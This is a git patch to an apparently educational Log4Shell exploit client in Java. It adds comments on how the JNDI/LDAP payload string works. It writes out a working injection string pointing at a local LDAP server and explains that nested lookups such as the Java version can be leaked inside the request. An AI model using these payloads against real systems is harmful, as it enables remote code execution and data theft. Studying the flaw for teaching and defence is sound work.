From 811f716da18f9e2a47dd1bbe5c642d7eaf933383 Mon Sep 17 00:00:00 2001 From: Lukas Arnold <lukas.arnold@stud.tu-darmstadt.de> Date: Wed, 22 Jun 2022 17:23:18 +0200 Subject: [PATCH] Adds more details about the string sent by the exploit --- .../src/main/java/de/seemoo/netsec/Log4ShellClient.java | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java b/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java index b432113..4cbf8b6 100644 --- a/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java +++ b/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java @@ -23,8 +23,15 @@ public class Log4ShellClient { // Sends the malicious message to trigger the remote code execution. // The message references to the LDAP server simultaneously running on port 389. - // Vulnerable Log4J version will contact it and download malicious class files. + // A vulnerable Log4J version will contact it and download malicious class files. // It is important to put any string after the last slash, otherwise the attack won't work. + + // Furthermore, it is also possible to replace 'anytext' with even more lookups. + // They will be evaluated before the request is sent to the LDAP server. + // Henceforth, one can send the string '${jndi:ldap://127.0.0.1:389/${java:version}}' which first + // evaluates the Java version and then sends the LDAP request. + // See: https://logging.apache.org/log4j/2.x/manual/lookups.html + writer.println("${jndi:ldap://127.0.0.1:389/anytext}"); writer.close(); -- GitLab